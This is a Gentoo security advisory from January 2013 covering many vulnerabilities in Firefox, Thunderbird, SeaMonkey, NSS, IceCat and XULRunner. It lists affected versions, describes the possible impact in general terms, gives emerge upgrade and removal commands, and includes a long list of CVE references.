Date: January 08, 2013
Bugs: #180159, #181361, #207261, #238535, #246602, #251322,
#255221, #255234, #255687, #257577, #260062, #261386,
#262704, #267234, #273918, #277752, #280226, #280234,
#280393, #282549, #284439, #286721, #290892, #292034,
#297532, #305689, #307045, #311021, #312361, #312645,
#312651, #312675, #312679, #312763, #313003, #324735,
#326341, #329279, #336396, #341821, #342847, #348316,
#357057, #360055, #360315, #365323, #373595, #379549,
#381245, #388045, #390771, #395431, #401701, #403183,
#404437, #408161, #413657, #419917, #427224, #433383,
#437780, #439586, #439960, #444318
ID: 201301-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Mozilla Firefox,
Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner, some of which
may allow execution of arbitrary code or local privilege escalation.
Background
==========
Mozilla Firefox is an open-source web browser and Mozilla Thunderbird
an open-source email client, both from the Mozilla Project. The
SeaMonkey project is a community effort to deliver production-quality
releases of code derived from the application formerly known as the
'Mozilla Application Suite'. XULRunner is a Mozilla runtime package
that can be used to bootstrap XUL+XPCOM applications such as Firefox
and Thunderbird. IceCat is the GNU version of Firefox.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/firefox < 10.0.11 >= 10.0.11
2 www-client/firefox-bin < 10.0.11 >= 10.0.11
3 mail-client/thunderbird < 10.0.11 >= 10.0.11
4 mail-client/thunderbird-bin
< 10.0.11 >= 10.0.11
5 www-client/seamonkey < 2.14-r1 >= 2.14-r1
6 www-client/seamonkey-bin
< 2.14 >= 2.14
7 dev-libs/nss < 3.14 >= 3.14
8 www-client/mozilla-firefox
<= 3.6.8 Vulnerable!
9 www-client/mozilla-firefox-bin
<= 3.5.6 Vulnerable!
10 mail-client/mozilla-thunderbird
<= 3.0.4-r1 Vulnerable!
11 mail-client/mozilla-thunderbird-bin
<= 3.0 Vulnerable!
12 www-client/icecat <= 10.0-r1 Vulnerable!
13 net-libs/xulrunner <= 2.0-r1 Vulnerable!
14 net-libs/xulrunner-bin <= 1.8.1.19 Vulnerable!
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
14 affected packages
Description
===========
Multiple vulnerabilities have been discovered in Mozilla Firefox,
Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to view a specially crafted web
page or email, possibly resulting in execution of arbitrary code or a
Denial of Service condition. Furthermore, a remote attacker may be able
to perform Man-in-the-Middle attacks, obtain sensitive information,
bypass restrictions and protection mechanisms, force file downloads,
conduct XML injection attacks, conduct XSS attacks, bypass the Same
Origin Policy, spoof URL's for phishing attacks, trigger a vertical
scroll, spoof the location bar, spoof an SSL indicator, modify the
browser's font, conduct clickjacking attacks, or have other unspecified
impact.
A local attacker could gain escalated privileges, obtain sensitive
information, or replace an arbitrary downloaded file.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Mozilla Firefox users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11"
All users of the Mozilla Firefox binary package should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"=
All Mozilla Thunderbird users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11"
All users of the Mozilla Thunderbird binary package should upgrade to
the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11"
All Mozilla SeaMonkey users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.14-r1"
All users of the Mozilla SeaMonkey binary package should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-2.14"
All NSS users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/nss-3.14"
The "www-client/mozilla-firefox" package has been merged into the
"www-client/firefox" package. To upgrade, please unmerge
"www-client/mozilla-firefox" and then emerge the latest
"www-client/firefox" package:
# emerge --sync
# emerge --unmerge "www-client/mozilla-firefox"
# emerge --ask --oneshot --verbose ">=www-client/firefox-10.0.11"
The "www-client/mozilla-firefox-bin" package has been merged into the
"www-client/firefox-bin" package. To upgrade, please unmerge
"www-client/mozilla-firefox-bin" and then emerge the latest
"www-client/firefox-bin" package:
# emerge --sync
# emerge --unmerge "www-client/mozilla-firefox-bin"
# emerge --ask --oneshot --verbose ">=www-client/firefox-bin-10.0.11"=
The "mail-client/mozilla-thunderbird" package has been merged into the
"mail-client/thunderbird" package. To upgrade, please unmerge
"mail-client/mozilla-thunderbird" and then emerge the latest
"mail-client/thunderbird" package:
# emerge --sync
# emerge --unmerge "mail-client/mozilla-thunderbird"
# emerge --ask --oneshot -v ">=mail-client/thunderbird-10.0.11"
The "mail-client/mozilla-thunderbird-bin" package has been merged into
the "mail-client/thunderbird-bin" package. To upgrade, please unmerge
"mail-client/mozilla-thunderbird-bin" and then emerge the latest
"mail-client/thunderbird-bin" package:
# emerge --sync
# emerge --unmerge "mail-client/mozilla-thunderbird-bin"
# emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-10.0.11"
Gentoo discontinued support for GNU IceCat. We recommend that users
unmerge GNU IceCat:
# emerge --unmerge "www-client/icecat"
Gentoo discontinued support for XULRunner. We recommend that users
unmerge XULRunner:
# emerge --unmerge "net-libs/xulrunner"
Gentoo discontinued support for the XULRunner binary package. We
recommend that users unmerge XULRunner:
# emerge --unmerge "net-libs/xulrunner-bin"
References
==========
[ 1 ] CVE-2011-3101
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3101
[ 2 ] CVE-2007-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2436
[ 3 ] CVE-2007-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2437
[ 4 ] CVE-2007-2671
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2671
[ 5 ] CVE-2007-3073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3073
[ 6 ] CVE-2008-0016
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0016
[ 7 ] CVE-2008-0017
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0017
[ 8 ] CVE-2008-0367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0367
[ 9 ] CVE-2008-3835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3835
[ 10 ] CVE-2008-3836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3836
[ 11 ] CVE-2008-3837
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3837
[ 12 ] CVE-2008-4058
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4058
[ 13 ] CVE-2008-4059
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4059
[ 14 ] CVE-2008-4060
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4060
[ 15 ] CVE-2008-4061
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4061
[ 16 ] CVE-2008-4062
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4062
[ 17 ] CVE-2008-4063
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4063
[ 18 ] CVE-2008-4064
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4064
[ 19 ] CVE-2008-4065
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4065
[ 20 ] CVE-2008-4066
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4066
[ 21 ] CVE-2008-4067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4067
[ 22 ] CVE-2008-4068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4068
[ 23 ] CVE-2008-4069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4069
[ 24 ] CVE-2008-4070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4070
[ 25 ] CVE-2008-4582
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4582
[ 26 ] CVE-2008-5012
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5012
[ 27 ] CVE-2008-5013
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5013
[ 28 ] CVE-2008-5014
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5014
[ 29 ] CVE-2008-5015
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5015
[ 30 ] CVE-2008-5016
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5016
[ 31 ] CVE-2008-5017
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5017
[ 32 ] CVE-2008-5018
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5018
[ 33 ] CVE-2008-5019
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5019
[ 34 ] CVE-2008-5021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5021
[ 35 ] CVE-2008-5022
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5022
[ 36 ] CVE-2008-5023
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5023
[ 37 ] CVE-2008-5024
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5024
[ 38 ] CVE-2008-5052
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5052
[ 39 ] CVE-2008-5500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5500
[ 40 ] CVE-2008-5501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5501
[ 41 ] CVE-2008-5502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5502
[ 42 ] CVE-2008-5503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5503
[ 43 ] CVE-2008-5504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5504
[ 44 ] CVE-2008-5505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5505
[ 45 ] CVE-2008-5506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5506
[ 46 ] CVE-2008-5507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5507
[ 47 ] CVE-2008-5508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5508
[ 48 ] CVE-2008-5510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5510
[ 49 ] CVE-2008-5511
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5511
[ 50 ] CVE-2008-5512
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5512
[ 51 ] CVE-2008-5513
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5513
[ 52 ] CVE-2008-5822
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5822
[ 53 ] CVE-2008-5913
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5913
[ 54 ] CVE-2008-6961
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6961
[ 55 ] CVE-2009-0071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071
[ 56 ] CVE-2009-0071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071
[ 57 ] CVE-2009-0352
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0352
[ 58 ] CVE-2009-0353
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0353
[ 59 ] CVE-2009-0354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0354
[ 60 ] CVE-2009-0355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0355
[ 61 ] CVE-2009-0356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0356
[ 62 ] CVE-2009-0357
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0357
[ 63 ] CVE-2009-0358
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0358
[ 64 ] CVE-2009-0652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0652
[ 65 ] CVE-2009-0771
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0771
[ 66 ] CVE-2009-0772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0772
[ 67 ] CVE-2009-0773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0773
[ 68 ] CVE-2009-0774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0774
[ 69 ] CVE-2009-0775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0775
[ 70 ] CVE-2009-0776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0776
[ 71 ] CVE-2009-0777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0777
[ 72 ] CVE-2009-1044
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1044
[ 73 ] CVE-2009-1169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1169
[ 74 ] CVE-2009-1302
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1302
[ 75 ] CVE-2009-1303
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1303
[ 76 ] CVE-2009-1304
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1304
[ 77 ] CVE-2009-1305
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1305
[ 78 ] CVE-2009-1306
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1306
[ 79 ] CVE-2009-1307
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1307
[ 80 ] CVE-2009-1308
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1308
[ 81 ] CVE-2009-1309
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1309
[ 82 ] CVE-2009-1310
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1310
[ 83 ] CVE-2009-1311
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1311
[ 84 ] CVE-2009-1312
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1312
[ 85 ] CVE-2009-1313
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1313
[ 86 ] CVE-2009-1392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1392
[ 87 ] CVE-2009-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1563
[ 88 ] CVE-2009-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1571
[ 89 ] CVE-2009-1828
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1828
[ 90 ] CVE-2009-1832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1832
[ 91 ] CVE-2009-1833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1833
[ 92 ] CVE-2009-1834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1834
[ 93 ] CVE-2009-1835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1835
[ 94 ] CVE-2009-1836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1836
[ 95 ] CVE-2009-1837
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1837
[ 96 ] CVE-2009-1838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1838
[ 97 ] CVE-2009-1839
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1839
[ 98 ] CVE-2009-1840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1840
[ 99 ] CVE-2009-1841
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1841
[ 100 ] CVE-2009-2043
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2043
[ 101 ] CVE-2009-2044
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2044
[ 102 ] CVE-2009-2061
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2061
[ 103 ] CVE-2009-2065
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2065
[ 104 ] CVE-2009-2210
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2210
[ 105 ] CVE-2009-2404
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2404
[ 106 ] CVE-2009-2408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2408
[ 107 ] CVE-2009-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2462
[ 108 ] CVE-2009-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2463
[ 109 ] CVE-2009-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2464
[ 110 ] CVE-2009-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2465
[ 111 ] CVE-2009-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2466
[ 112 ] CVE-2009-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2467
[ 113 ] CVE-2009-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2469
[ 114 ] CVE-2009-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2470
[ 115 ] CVE-2009-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2471
[ 116 ] CVE-2009-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2472
[ 117 ] CVE-2009-2477
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2477
[ 118 ] CVE-2009-2478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2478
[ 119 ] CVE-2009-2479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2479
[ 120 ] CVE-2009-2535
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2535
[ 121 ] CVE-2009-2654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2654
[ 122 ] CVE-2009-2662
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2662
[ 123 ] CVE-2009-2664
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2664
[ 124 ] CVE-2009-2665
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2665
[ 125 ] CVE-2009-3069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3069
[ 126 ] CVE-2009-3070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3070
[ 127 ] CVE-2009-3071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3071
[ 128 ] CVE-2009-3072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3072
[ 129 ] CVE-2009-3074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3074
[ 130 ] CVE-2009-3075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3075
[ 131 ] CVE-2009-3076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3076
[ 132 ] CVE-2009-3077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3077
[ 133 ] CVE-2009-3078
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3078
[ 134 ] CVE-2009-3079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3079
[ 135 ] CVE-2009-3274
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3274
[ 136 ] CVE-2009-3371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3371
[ 137 ] CVE-2009-3372
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3372
[ 138 ] CVE-2009-3373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3373
[ 139 ] CVE-2009-3374
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3374
[ 140 ] CVE-2009-3375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3375
[ 141 ] CVE-2009-3376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3376
[ 142 ] CVE-2009-3377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3377
[ 143 ] CVE-2009-3378
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3378
[ 144 ] CVE-2009-3379
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3379
[ 145 ] CVE-2009-3380
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3380
[ 146 ] CVE-2009-3381
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3381
[ 147 ] CVE-2009-3382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3382
[ 148 ] CVE-2009-3383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3383
[ 149 ] CVE-2009-3388
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3388
[ 150 ] CVE-2009-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3389
[ 151 ] CVE-2009-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555
[ 152 ] CVE-2009-3978
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3978
[ 153 ] CVE-2009-3979
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3979
[ 154 ] CVE-2009-3980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3980
[ 155 ] CVE-2009-3981
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3981
[ 156 ] CVE-2009-3982
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3982
[ 157 ] CVE-2009-3983
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3983
[ 158 ] CVE-2009-3984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3984
[ 159 ] CVE-2009-3985
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3985
[ 160 ] CVE-2009-3986
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3986
[ 161 ] CVE-2009-3987
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3987
[ 162 ] CVE-2009-3988
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3988
[ 163 ] CVE-2010-0159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0159
[ 164 ] CVE-2010-0160
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0160
[ 165 ] CVE-2010-0162
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0162
[ 166 ] CVE-2010-0163
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0163
[ 167 ] CVE-2010-0164
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0164
[ 168 ] CVE-2010-0165
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0165
[ 169 ] CVE-2010-0166
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0166
[ 170 ] CVE-2010-0167
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167
[ 171 ] CVE-2010-0167
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167
[ 172 ] CVE-2010-0168
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0168
[ 173 ] CVE-2010-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169
[ 174 ] CVE-2010-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169
[ 175 ] CVE-2010-0170
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0170
[ 176 ] CVE-2010-0171
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171
[ 177 ] CVE-2010-0171
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171
[ 178 ] CVE-2010-0172
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0172
[ 179 ] CVE-2010-0173
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0173
[ 180 ] CVE-2010-0174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174
[ 181 ] CVE-2010-0174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174
[ 182 ] CVE-2010-0175
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175
[ 183 ] CVE-2010-0175
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175
[ 184 ] CVE-2010-0176
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176
[ 185 ] CVE-2010-0176
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176
[ 186 ] CVE-2010-0177
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0177
[ 187 ] CVE-2010-0178
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0178
[ 188 ] CVE-2010-0179
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0179
[ 189 ] CVE-2010-0181
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0181
[ 190 ] CVE-2010-0182
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0182
[ 191 ] CVE-2010-0183
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0183
[ 192 ] CVE-2010-0220
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0220
[ 193 ] CVE-2010-0648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0648
[ 194 ] CVE-2010-0654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0654
[ 195 ] CVE-2010-1028
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1028
[ 196 ] CVE-2010-1121
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1121
[ 197 ] CVE-2010-1125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1125
[ 198 ] CVE-2010-1196
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1196
[ 199 ] CVE-2010-1197
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1197
[ 200 ] CVE-2010-1198
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1198
[ 201 ] CVE-2010-1199
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1199
[ 202 ] CVE-2010-1200
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1200
[ 203 ] CVE-2010-1201
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1201
[ 204 ] CVE-2010-1202
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1202
[ 205 ] CVE-2010-1203
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1203
[ 206 ] CVE-2010-1205
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205
[ 207 ] CVE-2010-1206
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1206
[ 208 ] CVE-2010-1207
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1207
[ 209 ] CVE-2010-1208
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1208
[ 210 ] CVE-2010-1209
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1209
[ 211 ] CVE-2010-1210
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1210
[ 212 ] CVE-2010-1211
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1211
[ 213 ] CVE-2010-1212
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1212
[ 214 ] CVE-2010-1213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1213
[ 215 ] CVE-2010-1214
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1214
[ 216 ] CVE-2010-1215
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1215
[ 217 ] CVE-2010-1585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1585
[ 218 ] CVE-2010-2751
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2751
[ 219 ] CVE-2010-2752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2752
[ 220 ] CVE-2010-2753
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2753
[ 221 ] CVE-2010-2754
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2754
[ 222 ] CVE-2010-2755
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2755
[ 223 ] CVE-2010-2760
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2760
[ 224 ] CVE-2010-2762
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2762
[ 225 ] CVE-2010-2763
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2763
[ 226 ] CVE-2010-2764
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2764
[ 227 ] CVE-2010-2765
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2765
[ 228 ] CVE-2010-2766
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2766
[ 229 ] CVE-2010-2767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2767
[ 230 ] CVE-2010-2768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2768
[ 231 ] CVE-2010-2769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2769
[ 232 ] CVE-2010-2770
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2770
[ 233 ] CVE-2010-3131
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3131
[ 234 ] CVE-2010-3166
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3166
[ 235 ] CVE-2010-3167
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3167
[ 236 ] CVE-2010-3168
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3168
[ 237 ] CVE-2010-3169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3169
